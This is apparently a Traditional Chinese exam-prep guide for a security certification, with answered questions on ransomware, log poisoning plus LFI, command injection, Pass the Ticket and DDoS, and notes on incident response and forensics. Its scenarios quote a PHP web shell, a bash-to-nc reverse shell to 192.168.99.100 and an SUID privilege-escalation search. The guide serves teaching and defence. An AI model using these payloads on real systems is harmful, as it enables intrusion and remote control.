<summary>查看答案</summary> **\(A\)\(C\)** - A 對：異地備份確保被加密後仍可還原 - B 錯：加密是保護資料的措施，禁用反而降低安全性 - C 對：白名單阻止未授權程式（含勒索軟體）執行 - D 錯：需要多層防護（縱深防禦），不能僅依賴內建功能 </details> --- > **Q：** 【題組 5】情境如圖所示。駭客刪除備份後發佈勒索訊息，請問下列何項行為的描述最為適切？ > > **情境**：2025 年 2 月時，A 公司及其關係企業遭受駭客組織發動的勒索攻擊。該攻擊發生於週末夜間，駭客成功潛入企業核心系統，刪除了所有備份，並聲稱竊取了 1TB 的機密資料。隔天清晨，企業官網首頁被竄改，發布了駭客的勒索訊息，要求在 24 小時內支付未公開的贖金，否則將外洩資料並摧毀企業聲譽。此次攻擊事件對 A 公司造成重大損失，公司核心系統 ERP、CRM…等業務系統全面癱瘓，生產與供應鏈亦因而停擺。 > > - \(A\) 偽裝攻擊 > - \(B\) 服務阻斷 > - \(C\) 勒索攻擊 > - \(D\) 社交工程 <details> <summary>查看答案</summary> **\(C\) 勒索攻擊** 勒索攻擊特徵：刪除備份 + 竊取資料 + 威脅公開 + 要求贖金 </details> --- > **Q：** 【題組 5】情境如圖所示。針對此事件，A 公司實施下列哪些的安全控制措施，可以協助有效降低風險？（複選） > > **情境**：2025 年 2 月時，A 公司及其關係企業遭受駭客組織發動的勒索攻擊。該攻擊發生於週末夜間，駭客成功潛入企業核心系統，刪除了所有備份，並聲稱竊取了 1TB 的機密資料。隔天清晨，企業官網首頁被竄改，發布了駭客的勒索訊息，要求在 24 小時內支付未公開的贖金，否則將外洩資料並摧毀企業聲譽。此次攻擊事件對 A 公司造成重大損失，公司核心系統 ERP、CRM…等業務系統全面癱瘓，生產與供應鏈亦因而停擺。 > > - \(A\) 實施多層備份策略 > - \(B\) 使用零信任網路架構 > - \(C\) 將備份系統與主網分離 > - \(D\) 定期刪除備份檔案 <details> <summary>查看答案</summary> **\(A\)\(B\)\(C\)** - A 對：多層備份確保不會被全部刪除 - B 對：零信任架構限制橫向移動，防止攻擊擴散 - C 對：備份與主網分離，避免備份被一起刪除 - D 錯：「定期刪除備份」會減少可用備份，增加風險 </details> --- > **Q：** 關於弱點攻擊的敘述，下列何者正確？（複選） > - \(A\) 軟體弱點或稱應用程式弱點，通常存在於軟體程式碼中，例如，錯誤的邏輯處理、未正確驗證輸入、設定配置錯誤造成危害等，都屬於這類的弱點 > - \(B\) 硬體弱點：這些弱點存在於硬體設備或韌體中，例如，沒有正確處理記憶體的設置，而導致裝置超載當機，甚至資料外洩 > - \(C\) 零日弱點：泛指廠商已經提供升級修補，卻沒進行升級更新的漏洞，攻擊者可以利用這些未被修補的弱點進行攻擊 > - \(D\) 網路弱點：這種弱點可能因為網路設計、配置或安全政策的問題，例如，開放不必要的網路通訊埠或服務，或者沒有使用安全加密的通訊協定 <details> <summary>查看答案</summary> **\(A\)\(B\)\(D\)** - A 對：軟體弱點定義正確 - B 對：硬體弱點定義正確 - C 錯：零日弱點是指「廠商**尚未**提供修補」的漏洞，不是「已提供但未更新」 - D 對：網路弱點定義正確 </details> --- > **Q：** 關於知名密碼破解工具 Hashcat 的說明，下列哪些描述正確？（複選） > - \(A\) 可以破解的密碼種類超過 10 種 > - \(B\) 可以使用 ?u?l?d?d?d?d?d?d 這種 Mask Attack Mode 來進行暴力破解，破解出來的密碼內容範例是 aB123456 > - \(C\) 如果使用參數 -a 1 的話，可以同時使用兩個字典檔一起組合破解 > - \(D\) 進行 -a 0 字典檔攻擊時，如果使用參數 -r 的話，可以載入一組規則以便進行 Rule-based Attack，例如在所有字典的後面加上 1234 組合成新的密碼 <details> <summary>查看答案</summary> **\(A\)\(C\)\(D\)** - A 對：Hashcat 支援超過 300 種雜湊類型 - B 錯：?u 是大寫、?l 是小寫，範例應為 Ab123456（第一字元大寫、第二字元小寫） - C 對：-a 1 是 Combination Attack，組合兩個字典 - D 對：-a 0 是字典攻擊，-r 可載入規則進行變化 </details> --- > **Q：** 【題組 1】情境如附圖所示。在進行例行性的檢查時，你發現在 WEB 主機上，出現了附圖一的 log 記錄，這個 log 記錄中，出現了登入錯誤的訊息，但這個訊息恐怕不是登入錯誤而已，這樣的 log 記錄內容，你可能已經遭受到下列何種攻擊？ > >  > > - \(A\) 修改網站的配置文件以獲得管理員權限 > - \(B\) 利用 SQL 注入漏洞來控制資料庫，進而執行代碼 > - \(C\) 通過注入惡意指令到 SSH 日誌文件中，然後通過 LFI（Local File Inclusion）加載該日誌文件來執行惡意指令 > - \(D\) 網站被發起了 XSS Server Side 的攻擊 <details> <summary>查看答案</summary> **\(C\) 通過注入惡意指令到 SSH 日誌文件中，然後通過 LFI（Local File Inclusion）加載該日誌文件來執行惡意指令** 日誌中出現 `<?php system($_GET[c]); ?>` 作為使用者名稱，這是 Log Poisoning 攻擊： 1. 攻擊者用惡意 PHP 程式碼當作 SSH 登入帳號 2. 失敗的登入被記錄到 auth.log 3. 再透過 LFI 漏洞載入日誌檔執行惡意指令 </details> --- > **Q：** 【題組 1】情境如附圖所示。在你自覺到公司的網站伺服器可能入侵的同時，你發現在資料庫伺服器的工作排程中出現了一個名為 windows update 的工作，執行的內容如附圖二所示。請問對於 windows update 的工作內容描述，下列何者正確？ > >  > > - \(A\) 這是段 Powershell，它試圖在背景執行，且會產出一個名為 LSASS 的 Script > - \(B\) 就說明看來它應該 Windows 更新工作 > - \(C\) 這是段 Powershell，它試圖略過執行政策並且轉換 Script 為執行檔 > - \(D\) 就說明看來它應該是會產生一支可進行 Windows 更新的檔案 <details> <summary>查看答案</summary> **\(C\) 這是段 Powershell，它試圖略過執行政策並且轉換 Script 為執行檔** 指令分析： - `-ExecutionPolicy bypass`：繞過 PowerShell 執行政策 - `-inputFile 'LSASS.ps1'`：輸入檔案（LSASS 是 Windows 憑證存放程序） - `-outputFile 'Winupdate.exe'`：輸出為執行檔（偽裝成 Windows 更新） 這是典型 APT 手法：繞過安全政策、利用 LSASS 竊取憑證、偽裝成合法程式。 </details> --- > **Q：** 【題組 1】情境如附圖所示。當資安小組開始調查這個事件時，在 AD 主機上發現了附圖三的內容。請問你遭受了什麼類型的攻擊？ > >  > > - \(A\) 你的組織受到了 Denial of Service 攻擊 > - \(B\) 你的組織受到了 Pass the Ticket 攻擊 > - \(C\) 你的組織受到了 Buffer Overflow 攻擊 > - \(D\) 你的組織受到了 Directory Sync 攻擊 <details> <summary>查看答案</summary> **\(B\) 你的組織受到了 Pass the Ticket 攻擊** 關鍵證據： - `.kirbi` 檔案：Kerberos 票據格式 - 檔名包含 `krbtgt`：Kerberos TGT 票據 - `mimikatz` 工具：用於提取憑證與票據 這是典型 Pass the Ticket 攻擊，攻擊者用 Mimikatz 竊取 Kerberos 票據後冒用身分。 </details> --- > **Q：** 【題組 1】情境如附圖所示。針對上述情境，下列哪些措施可以有效降低類似攻擊再次發生的機率？（複選） > > **情境**：您的安全團隊在公司的網站伺服器上發現了異常的入侵跡像，資料庫似乎遭受了注入攻擊，且在 Active Directory（AD）主機上發現了未知的高權限帳號。這些跡象都代表了可能有一個進階持續性威脅（Advanced Persistent Threat，APT）組織在進行攻擊。 > > - \(A\) 針對資料庫主機購置更強的資料庫稽核系統 > - \(B\) 定期進行員工安全意識培訓 > - \(C\) 加強對網路和系統的持續監控 > - \(D\) 實施更嚴格的身份驗證和存取控制策略 <details> <summary>查看答案</summary> **\(B\)\(C\)\(D\)** - A 錯：稽核系統是事後記錄，無法直接「降低攻擊發生機率」 - B 對：安全意識培訓可降低社交工程風險（APT 常見入侵手法） - C 對：持續監控可及早發現異常行為 - D 對：嚴格身份驗證和存取控制可限制攻擊者橫向移動 </details> --- > **Q：** 勒索軟體與資料外洩攻擊之準備、預防、緩解與應變之實務上，可透過分析系統執行特定指令來進行威脅獵補（Threat hunting），以即早偵測並發現異常行為。下列何種 Windows 指令「非」勒索軟體常用於竄改系統檔案/備份之目的？ > - \(A\) fsutil.exe > - \(B\) ntfsbackup.exe > - \(C\) vssadmin.exe > - \(D\) wbadmin.exe <details> <summary>查看答案</summary> **\(B\) ntfsbackup.exe** - fsutil.exe：檔案系統工具，可操作檔案 - ntfsbackup.exe：**非標準 Windows 指令**，不存在 - vssadmin.exe：磁碟區陰影複製管理，勒索軟體常用來刪除 VSS 備份 - wbadmin.exe：Windows 備份管理，可用於刪除備份 </details> --- > **Q：** 【題組 2】情境如附圖所示。該公司資安人員針對所有資訊資產進行了弱點掃描作業。試問有關該資安人員所實施的弱點掃描敘述，下列何者錯誤？ > > **情境**：A 公司為一金融機構（資通安全責任等級 A 級），近期因為駭客攻擊事件頻仍，因此該公司資安長要求內部必須針對目前外在資安環境以及內部資訊資產的變化，重新檢視與評估潛在的風險並於以適切之處理，以確保該公司的資訊安全。 > > - \(A\) 使用 Fortify Static Code Analyzer 執行網站弱點掃描作業 > - \(B\) 使用 Nessus Professional 執行系統弱點掃描作業 > - \(C\) 將弱點掃描結果屬於中風險程度以上之弱點進行後續處理之評估 > - \(D\) 依據弱點修補結果實施第二次的弱點掃描複測作業 <details> <summary>查看答案</summary> **\(A\) 使用 Fortify Static Code Analyzer 執行網站弱點掃描作業** - A 錯：Fortify 是 **SAST（靜態原始碼分析）**工具，不是網站弱點掃描 - B 對：Nessus 是系統弱點掃描工具 - C 對：中風險以上應進行後續處理評估 - D 對：修補後應複測確認修補成效 </details> --- > **Q：** 【題組 5】情境如附圖所示。測試人員在登入畫面發現登入畫面上會針對登入錯誤供了詳細的訊息，如：密碼錯誤、帳號不存在，在嘗試以 Hydra 進行帳密進行暴力破解時，發現都會出現的是登入錯誤的訊息，經過檢查如附圖一所示，此種登入雖然過度的揭露的訊息，它但每次登入時，都會更新附圖一中的值，這種防護方法可以有效的避免那一種攻擊？ > >  > > - \(A\) SQL 注入（SQL Injection） > - \(B\) 跨站請求偽造（Cross Site Request Forgery） > - \(C\) 指令注入（Command Injection） > - \(D\) 跨站指令碼（Cross Site Scripting） <details> <summary>查看答案</summary> **\(B\) 跨站請求偽造（Cross Site Request Forgery）** 附圖中的 `_token` 是 **CSRF Token**，每次請求時更新，用於驗證請求來源的合法性。 - A 錯：SQL Injection 防護靠參數化查詢、輸入驗證 - B 對：CSRF Token 每次更新，攻擊者無法預測，可有效防止 CSRF - C 錯：Command Injection 防護靠白名單、避免直接串接指令 - D 錯：XSS 防護靠 Output Encoding、CSP </details> --- > **Q：** 【題組 5】情境如附圖所示。檢測人員在利用 SQL 注入（SQL Injection）成功後，發現在 /var/logs/AUTH.log 中，出現了一個名為 `<?php system($_GET['c']); ?>` 的帳號嘗試登入該主機，如果這網站存在 LFI（Local File Inclusion）弱點時，可以從 Web access log 中的 uri query string 找到什麼特徵？ > >  > > - \(A\) C= '' or 1=1 - - > - \(B\) C=alert(document.cookie) > - \(C\) C=whoami && ip addr && hostname > - \(D\) C=SLEEP(5) <details> <summary>查看答案</summary> **\(C\) C=whoami && ip addr && hostname** 這是 **Log Poisoning + LFI** 攻擊鏈： 1. 攻擊者用 `<?php system($_GET['c']); ?>` 作為帳號嘗試登入 2. 登入失敗，但「帳號」被寫入 AUTH.log 3. 透過 LFI 漏洞載入 AUTH.log，觸發 PHP 程式碼執行 4. 參數 `c` 的值會被 `system()` 執行 - A 錯：SQL Injection 特徵 - B 錯：XSS 特徵 - C 對：系統命令（whoami, ip addr, hostname），符合 Command Injection - D 錯：SQL Injection 時間盲注特徵 </details> --- > **Q：** 下列的弱點應對修補方式，何者最為適當？ > - \(A\) 緩衝區溢位（Buffer Overflow）使用記憶體執行阻擋（Data Execution Prevention, DEP） > - \(B\) 遠端程式碼執行（RCE）僅以防火牆封鎖流量 > - \(C\) 指令注入（Command Injection）只做字串過濾 > - \(D\) 資源注入（Resource Injection）採黑名單過濾資源名稱 <details> <summary>查看答案</summary> **\(A\) 緩衝區溢位（Buffer Overflow）使用記憶體執行阻擋（Data Execution Prevention, DEP）** - A 對：DEP 可阻止記憶體中的資料被當作程式碼執行，是 Buffer Overflow 的有效防護 - B 錯：「僅」用防火牆不夠，RCE 應從根本修補漏洞 - C 錯：「只做」字串過濾不夠，Command Injection 應用白名單、參數化 - D 錯：「黑名單」容易被繞過，應採白名單過濾 > 關鍵字「僅」「只做」「黑名單」通常代表不完整的防護措施 </details> --- > **Q：** 伺服器端請求偽造（Server Side Request Forgery, SSRF）是過去幾年很流行的攻擊手法，下列關於 SSRF 的描述何項「錯誤」？ > - \(A\) 有機會用來對內網進行 port scan > - \(B\) 有機會透過 file:// 協定讀取系統檔案，例如讀取 Linux 作業系統的 /etc/passwd > - \(C\) 只要使用正規表示式把 10.0.0.0 - 10.255.255.255、172.16.0.0 - 172.31.255.255、192.168.0.0 - 192.168.255.255 從參數內容過濾掉，攻擊者就無法透過 SSRF 存取內網 > - \(D\) 有機會透過 dict:// 協定存取 Redis 資料庫 <details> <summary>查看答案</summary> **\(C\) 只要使用正規表示式把私有 IP 過濾掉，攻擊者就無法透過 SSRF 存取內網** - A 對：SSRF 可用於內網 port scan - B 對：SSRF 支援 file:// 協定讀取本地檔案 - C 錯：過濾私有 IP 不夠，攻擊者可繞過： - 127.0.0.1（localhost）未被過濾 - IPv6 地址（如 ::1） - DNS Rebinding - URL 編碼繞過 - 短網址重定向 - D 對：SSRF 可用 dict:// 協定與 Redis 互動 > SSRF 防護應採**白名單**而非黑名單 </details> --- > **Q：** 釣魚攻擊中常見的「憑證收集（Credential Harvesting）」指的是下列何種做法？ > - \(A\) 植入遠端存取木馬（Remote Access Trojan, RAT） > - \(B\) 對硬碟進行全碟資料傾印（Dumper） > - \(C\) 利用 CAPTCHA 阻擋分析 > - \(D\) 偽裝成登入頁面，以騙取使用者的帳號與密碼 <details> <summary>查看答案</summary> **\(D\) 偽裝成登入頁面，以騙取使用者的帳號與密碼** - A 錯：RAT 是遠端控制木馬，屬於惡意程式 - B 錯：Dumper 是資料傾印工具，用於竊取已存在的資料 - C 錯：CAPTCHA 是防護機制，不是攻擊手法 - D 對：Credential Harvesting = 釣魚假登入頁騙取帳密 </details> --- > **Q：** 為了防範常見的網站應用程式攻擊，如 SQL 注入（SQL Injection）與跨網站指令碼（XSS），開發團隊在設計安全架構時，應實施下列哪些防護與應變技術最為適切？（複選） > - \(A\) 在伺服器端採用參數化查詢（Parameterized Queries）或預處理敘述（Prepared Statements）來處理所有資料庫操作 > - \(B\) 在網頁前端實作嚴格的內容安全策略（Content Security Policy, CSP）以限制外部腳本的載入與執行 > - \(C\) 對所有使用者輸入的資料，在輸出至網頁時進行適當的編碼（Output Encoding） > - \(D\) 僅在 HTTP 協定上運行網站，避免 HTTPS 加密造成的效能損耗 <details> <summary>查看答案</summary> **\(A\)\(B\)\(C\)** - A 對：參數化查詢 / Prepared Statements → 防止 SQL Injection - B 對：CSP 限制外部腳本載入與執行 → 防止 XSS - C 對：Output Encoding 對輸出進行編碼 → 防止 XSS - D 錯：應使用 HTTPS，HTTP 明文傳輸不安全 </details> --- > **Q：** 【題組 1】情境如附圖所示。「在系統插入惡意 OGNL 語法，成功遠端執行任意指令並取得 Shell 權限」這一攻擊行為，根據 MITRE ATT&CK，最適合歸類於下列哪一個戰術？ > > **情境**：某醫療資訊系統採用 Apache Struts 2 作為開發框架，且版本未及時更新。該醫院在做紅隊演練時，施測人員發現可透過特定 HTTP 請求，於 HTTP Header 中對醫療資訊系統插入惡意 OGNL（Object Graph Navigation Language）語法，成功在系統上遠端執行任意指令（RCE），取得 Shell 權限。施測人員進一步利用此權限，在內網大量掃描，並且進行橫向移動（Lateral Movement），最終施測人員找到資料庫的伺服器，並且以預設帳號密碼登入，竊取大量病患的醫療資料，若這個漏洞被攻擊者利用，將會造成嚴重的機密資料外洩事件。 > > - \(A\) Reconnaissance（偵察） > - \(B\) Initial Access（初始存取） > - \(C\) Privilege Escalation（權限提升） > - \(D\) Defense Evasion（防禦規避） <details> <summary>查看答案</summary> **\(B\) Initial Access（初始存取）** - A 錯：Reconnaissance 是蒐集目標資訊階段，尚未進入系統 - B 對：透過漏洞利用（Apache Struts 2 RCE）首次進入系統，屬於 **Initial Access** - C 錯：Privilege Escalation 是已進入系統後提升權限，題目是「取得 Shell 權限」的初始進入 - D 錯：Defense Evasion 是規避偵測，與題目描述無關 </details> --- > **Q：** 【題組 2】情境如附圖所示。某一天業務人員反應在公司外部無法連回公司展示伺服器進行 Demo，將 MIS 人員檢查，公司上網電路正常，由公司連外上網也正常，檢查主機連線記錄（附圖二）及網路側錄資料（附圖三）。請問業務無法在外部展示期間，公司最可能遭受下列什麼類型的攻擊？ > >  > > - \(A\) 跨站腳本攻擊（Cross Site Scripting） > - \(B\) DNS 洪水攻擊（DNS Flood） > - \(C\) HTTP 洪水攻擊（HTTP Flood） > - \(D\) ICMP 洪水攻擊（ICMP Flood） <details> <summary>查看答案</summary> **\(C\) HTTP 洪水攻擊（HTTP Flood）** 從附圖分析： - 主機連線記錄：Session 數量突然飆升至 3M - 網路側錄資料：大量來自不同來源 IP 的 TCP 連線，目標皆為 443 埠（HTTPS） 判斷依據： - A 錯：XSS 是注入攻擊，不會造成連線數飆升 - B 錯：DNS Flood 攻擊目標是 53 埠，非 443 埠 - C 對：大量 HTTP/HTTPS 請求（443 埠）導致伺服器無法回應 → **HTTP Flood** - D 錯：ICMP Flood 是 Ping 攻擊，不會出現 TCP 443 連線 </details> --- > **Q：** 【題組 2】情境如附圖所示。承上題，請問下列何項不是分散式阻斷服務（DDoS）攻擊的破壞目的？ > - \(A\) 癱瘓系統服務主機 > - \(B\) 破壞系統服務程式 > - \(C\) 影響網頁服務正常運作 > - \(D\) 塞爆服務網路的頻寬 <details> <summary>查看答案</summary> **\(B\) 破壞系統服務程式** DDoS 攻擊的目的是「消耗資源使服務不可用」，而非破壞程式本身： - A 對：癱瘓主機 → DDoS 目的（耗盡 CPU/記憶體） - B 錯：**破壞程式**不是 DDoS 目的，DDoS 是讓服務「不可用」而非「損壞」 - C 對：影響服務正常運作 → DDoS 目的 - D 對：塞爆頻寬 → DDoS 目的（耗盡網路資源） </details> --- > **Q：** 【題組 4】情境如附圖所示。請問這些日誌內容裡面的「127.0.0.1; sleep 5」，最有可能是發生下列哪一種攻擊情境？ > > **情境**：你是一位企業的藍隊防禦專家，今天你忽然收到來自 SOC 的告警，顯示有某個伺服器正在發生異常行為，於是你開始對這個伺服器展開調查，評估是否有發生資安事件。你發現伺服器裡面有一個 ping 的功能，並且在該功能的網頁應用程式日誌裡面出現這種類型的內容： > ``` > 127.0.0.1; sleep 5 > 127.0.0.1; whoami > 127.0.0.1; /bin/bash -i 2>&1 | nc 192.168.99.100 80 > /tmp/tmp.txt > ``` > > - \(A\) 攻擊者想確認該功能是否存在資料庫注入攻擊（SQL Injection） > - \(B\) 攻擊者想確認該功能是否存在反序列化攻擊（Insecure Deserialization） > - \(C\) 攻擊者想確認該功能是否存在指令注入攻擊（Command Injection） > - \(D\) 攻擊者想確認該功能是否存在資安記錄及監控失效（Security Logging and Monitoring Failures） <details> <summary>查看答案</summary> **\(C\) 攻擊者想確認該功能是否存在指令注入攻擊（Command Injection）** 日誌分析： - `127.0.0.1; sleep 5`：用分號 `;` 串接系統指令，測試是否能執行 - `127.0.0.1; whoami`：確認當前執行身分 - `127.0.0.1; /bin/bash -i 2>&1 | nc ...`：建立**反向 Shell** 連線 這是典型的 **Command Injection** 攻擊模式： 1. 攻擊者在 ping 參數後加上 `;`（指令分隔符號） 2. 後面接上要執行的系統指令 3. 伺服器若未正確過濾，會將整串當作指令執行 </details> --- > **Q：** 【題組 2】情境如附圖所示。承上題，針對 TCP SYN Flood 攻擊，下列何項應對策略可能無法有效緩解攻擊的影響？ > - \(A\) 啟用 DNS 反向代理 > - \(B\) 設定 TCP 連接速率限制 > - \(C\) 啟用 SYN Cookies 機制 > - \(D\) 將展示服務部署到內容派遣網路（Content Distribution Network, CDN）上，由 CDN 進行 DDoS 防禦 <details> <summary>查看答案</summary> **\(A\) 啟用 DNS 反向代理** - A 錯：DNS 反向代理是針對 **DNS 攻擊**的防護，與 TCP SYN Flood 無關 - B 對：TCP 連接速率限制可減緩 SYN Flood 影響 - C 對：**SYN Cookie** 是專門針對 SYN Flood 的防護機制 - D 對：CDN 可分散流量並提供 DDoS 防禦 </details> --- > **Q：** 【題組 4】情境如附圖所示。請問「127.0.0.1; whoami」可能是攻擊者想要用來評估下列何項資訊？（請選擇最合適的選項。） > > **情境**：你是一位企業的藍隊防禦專家，今天你忽然收到來自 SOC 的告警，顯示有某個伺服器正在發生異常行為，於是你開始對這個伺服器展開調查，評估是否有發生資安事件。你發現伺服器裡面有一個 ping 的功能，並且在該功能的網頁應用程式日誌裡面出現這種類型的內容： > ``` > 127.0.0.1; sleep 5 > 127.0.0.1; whoami > 127.0.0.1; /bin/bash -i 2>&1 | nc 192.168.99.100 80 > /tmp/tmp.txt > ``` > > - \(A\) 評估此作業系統版本是否有現成的漏洞可以利用 > - \(B\) 評估該使用者是否有足夠的權限可以存取機敏資料 > - \(C\) 評估該使用者的群組是否有足夠的權限可以存取機敏資料 > - \(D\) 評估當下的系統路徑位於哪個目錄中 <details> <summary>查看答案</summary> **\(B\) 評估該使用者是否有足夠的權限可以存取機敏資料** `whoami` 指令會回傳**當前執行程序的使用者身分**，攻擊者用此確認取得的權限等級。 常見偵察指令對照： | 指令 | 用途 | |:-----|:-----| | `whoami` | 查詢當前使用者身分 | | `id` / `groups` | 查詢使用者所屬群組 | | `uname -a` | 查詢作業系統版本 | | `pwd` | 查詢當前目錄位置 | </details> --- > **Q：** 【題組 4】情境如附圖所示。請問「127.0.0.1; /bin/bash -i 2>&1 | nc 192.168.99.100 80 > /tmp/tmp.txt」這個日誌的內容，可能代表下列何種攻擊情境？（請選擇最合適的選項。） > > **情境**：你是一位企業的藍隊防禦專家，今天你忽然收到來自 SOC 的告警，顯示有某個伺服器正在發生異常行為，於是你開始對這個伺服器展開調查，評估是否有發生資安事件。你發現伺服器裡面有一個 ping 的功能，並且在該功能的網頁應用程式日誌裡面出現這種類型的內容： > ``` > 127.0.0.1; sleep 5 > 127.0.0.1; whoami > 127.0.0.1; /bin/bash -i 2>&1 | nc 192.168.99.100 80 > /tmp/tmp.txt > ``` > > - \(A\) 攻擊者想要勘查 192.168.99.100 的 80 port 是否可進行連線，可以連線就可以讀取更多網頁內容 > - \(B\) 攻擊者想要讀取 /bin/bash 這個檔案內容，並且把結果輸出到 /tmp/tmp.txt 裡面 > - \(C\) 攻擊者想要透過 nc 進行反向連線，讓 192.168.99.100 這台電腦可以對伺服器輸入指令 > - \(D\) 攻擊者想要讀取作業系統的版本資訊，並且尋找有無可利用的漏洞直接對作業系統進行攻擊 <details> <summary>查看答案</summary> **\(C\) 攻擊者想要透過 nc 進行反向連線，讓 192.168.99.100 這台電腦可以對伺服器輸入指令** 這是典型的 **Reverse Shell（反向 Shell）** 指令： | 指令片段 | 作用 | |:---------|:-----| | `/bin/bash -i` | 啟動互動式 bash shell | | `2>&1` | 將錯誤訊息（stderr）重導向到標準輸出（stdout） | | `\| nc 192.168.99.100 80` | 透過 netcat 連線到攻擊者機器（192.168.99.100:80） | > **Reverse Shell**：受害主機主動連線到攻擊者控制的機器，讓攻擊者可遠端下指令，常用於繞過防火牆的 Inbound 限制 </details> --- > **Q：** 【題組 4】情境如附圖所示。你參考日誌內容，嘗試輸入一樣的參數內容「127.0.0.1; whoami」到網頁應用程式中，發現回傳結果是 www-data。同時，你也在作業系統的指令日誌裡面看到「find / -perm -u=s -type f 2>/dev/null」，請問攻擊者執行這個指令「最不可能」做下列哪些攻擊行為？（請選擇最合適的選項。）（複選） > > **情境**：你是一位企業的藍隊防禦專家，今天你忽然收到來自 SOC 的告警，顯示有某個伺服器正在發生異常行為，於是你開始對這個伺服器展開調查，評估是否有發生資安事件。你發現伺服器裡面有一個 ping 的功能，並且在該功能的網頁應用程式日誌裡面出現這種類型的內容： > ``` > 127.0.0.1; sleep 5 > 127.0.0.1; whoami > 127.0.0.1; /bin/bash -i 2>&1 | nc 192.168.99.100 80 > /tmp/tmp.txt > ``` > > - \(A\) 尋找有被設定 setuid 的檔案，後續可嘗試用該檔案來把當前身分提升成為 root 權限 > - \(B\) 尋找有被設定 setgid 的檔案，後續可嘗試用該檔案來把當前身分提升成為 root 權限 > - \(C\) 尋找有被設定 stickyBit 的目錄，後續可嘗試用該目錄裡面的檔案來提升成為 root 權限 > - \(D\) 尋找有被設定為 root:root 的檔案與目錄，確認機敏資料在哪些地方 <details> <summary>查看答案</summary> **\(B\)\(C\)\(D\)** 指令分析：`find / -perm -u=s -type f 2>/dev/null` | 參數 | 作用 | |:-----|:-----| | `-perm -u=s` | 尋找有 **SUID（setuid）** 權限的檔案 | | `-type f` | 只找檔案（不找目錄） | | `2>/dev/null` | 隱藏錯誤訊息 | - A 對：這正是指令目的 → **可能**的行為（故不選） - B 錯：setgid 應使用 `-perm -g=s`，不是 `-u=s` → **不可能** - C 錯：stickyBit 應使用 `-perm -t`，不是 `-u=s` → **不可能** - D 錯：找擁有者應使用 `-user root`，此指令找的是權限 bit → **不可能** > **SUID 提權**：若 SUID 檔案存在漏洞（如可執行任意指令），攻擊者可利用其以 root 身分執行惡意操作 </details> --- ## 3.2 防護與應變實務 ### 網路安全設備 **防火牆類型**： | 類型 | 層級 | 特性 | |------|------|------| | 封包過濾 | L3-L4 | 檢查 IP/Port | | 狀態檢測 | L3-L4 | 追蹤連線狀態 | | 應用層閘道 | L7 | 完整檢查內容 | | NGFW | L3-L7 | 整合 IPS、應用識別 | | WAF | L7 | 專防 Web 攻擊（SQLi、XSS），規則可被繞過 | **IDS vs IPS**： | 項目 | IDS | IPS | |------|-----|-----| | 功能 | 偵測並告警 | 偵測並阻擋 | | 部署 | 旁路監聽 | 串接 | **偵測方法**： - Signature-based：準確但無法偵測未知攻擊 - Anomaly-based：可偵測未知攻擊但誤報較高 **Honeypot / Honeynet（蜜罐/蜜網）**：模擬假目標吸引攻擊者，用於偵測、分析攻擊行為 ### 端點安全 | 技術 | 說明 | 特點 | |:-----|:-----|:-----| | 傳統防毒 | 特徵碼比對 | 無法偵測未知威脅 | | EDR | 端點偵測與回應 | 行為分析、可偵測未知威脅、支援事件調查 | **EDR 核心功能**： - 行為偵測（非特徵碼） - 即時監控端點活動 - 威脅獵捕（Threat Hunting） - 事件調查與回應 ### 事件處理流程 ``` 準備 → 識別 → 遏制 → 根除 → 復原 → 檢討 ``` **事件確認後首要動作**：遏制（Containment），防止擴散 **EDR 告警處理**：隔離端點網路、擷取 RAM、製作磁碟鑑識映像 ### 數位鑑識 **證據揮發性順序**（優先蒐集）： 1. CPU 暫存器/快取 2. RAM（記憶體） 3. 網路連線狀態 4. 執行中程序 5. 硬碟 6. 備份媒體 **完整性驗證**：製作鏡像並計算 Hash **監管鏈（Chain of Custody）**：記錄證據移轉過程 ### 營運持續與災難復原 | 計畫 | 英文 | 範圍 | |:-----|:-----|:-----| | BCP | Business Continuity Plan | 組織整體業務運營持續 | | DRP | Disaster Recovery Plan | 資訊技術系統的恢復 | | ISCP | Information System Contingency Plan | 特定資訊系統的應急反應 | > 範圍大小：BCP（整體業務）> DRP（IT 系統）> ISCP（特定系統） **BIA（Business Impact Analysis，業務衝擊分析）**： - 核心目標：確定關鍵業務流程、評估資源中斷的影響、設定復原優先級 - 產出：RTO（復原時間目標）、RPO（復原點目標）、關鍵資源清單 --- ### 114 年考題補充 > **Q：** 某業者近期頻繁遭受勒索軟體攻擊，其攻擊路徑多數是透過員工端點電腦感染後擴散。在強化端點安全防護時，除了傳統防毒軟體外，可評估導入下列何種技術以有效偵測並阻擋未知勒索軟體行為？ > - \(A\) 加強網路層防火牆規則設定 > - \(B\) 於核心網路部署入侵偵測系統（Intrusion Detection System, IDS） > - \(C\) 導入端點偵測與回應（Endpoint Detection & Response, EDR）解決方案 > - \(D\) 導入增強寫入過濾器（Enhanced Write Filter, EWF）等系統保護機制 <details> <summary>查看答案</summary> **\(C\) 導入端點偵測與回應（Endpoint Detection & Response, EDR）解決方案** - A 錯：防火牆是網路層，無法偵測端點上的未知勒索軟體行為 - B 錯：IDS 是網路層偵測，非端點防護 - C 對：EDR 透過行為分析偵測未知威脅，正是針對端點的進階防護 - D 錯：EWF 是防止系統被修改（如 ATM），不是偵測威脅 </details> --- > **Q：** 【題組 3】情境如附圖所示。公司於國內希望統一控管對外連線，所有的網際網路流量可以被監控，下列何項方案最「不」適切？ > > **情境**：某上市公司因覺得國內市場飽和，同時考量降低生產成本，以求增加其產品的競爭力與組織獲利，故公司國內於南部設有公司總部，並於附近有一生產基地，另於東南亞 V 國有一生產基地，並於美國及歐洲有營業據點，以擴展公司的業務。 > > - \(A\) 於總部及生產基地各自佈署防火牆並集中管理規則與日誌 > - \(B\) 總部及生產基地各自租賃網際網路服務存取網際網路直接對外連線 > - \(C\) 租用專線（Leased Line）連接總部與生產基地，對外連線統一從總部出口 > - \(D\) 生產基地透過站台對站台虛擬私人網路（Site-to-Site VPN），將流量全部導向公司總部 <details> <summary>查看答案</summary> **\(B\) 總部及生產基地各自租賃網際網路服務存取網際網路直接對外連線** - A 對：各自佈署但「集中管理」規則與日誌，可統一監控 - B 錯：各自直接對外連線，流量分散，無法統一監控 - C 對：專線連接 + 統一出口，可集中監控 - D 對：Site-to-Site VPN 導向總部，可集中監控 核心概念：統一出口 = 便於集中監控 </details> --- > **Q：** 據 NIST SP 800 系列標準，關於災難復原計畫（Disaster Recovery Plan，DRP）、業務持續性計畫（Business Continuity Plan，BCP）和資訊系統應急準備計畫（Information System Contingency Plan，ISCP）的關聯性，下列何項描述正確？ > - \(A\) 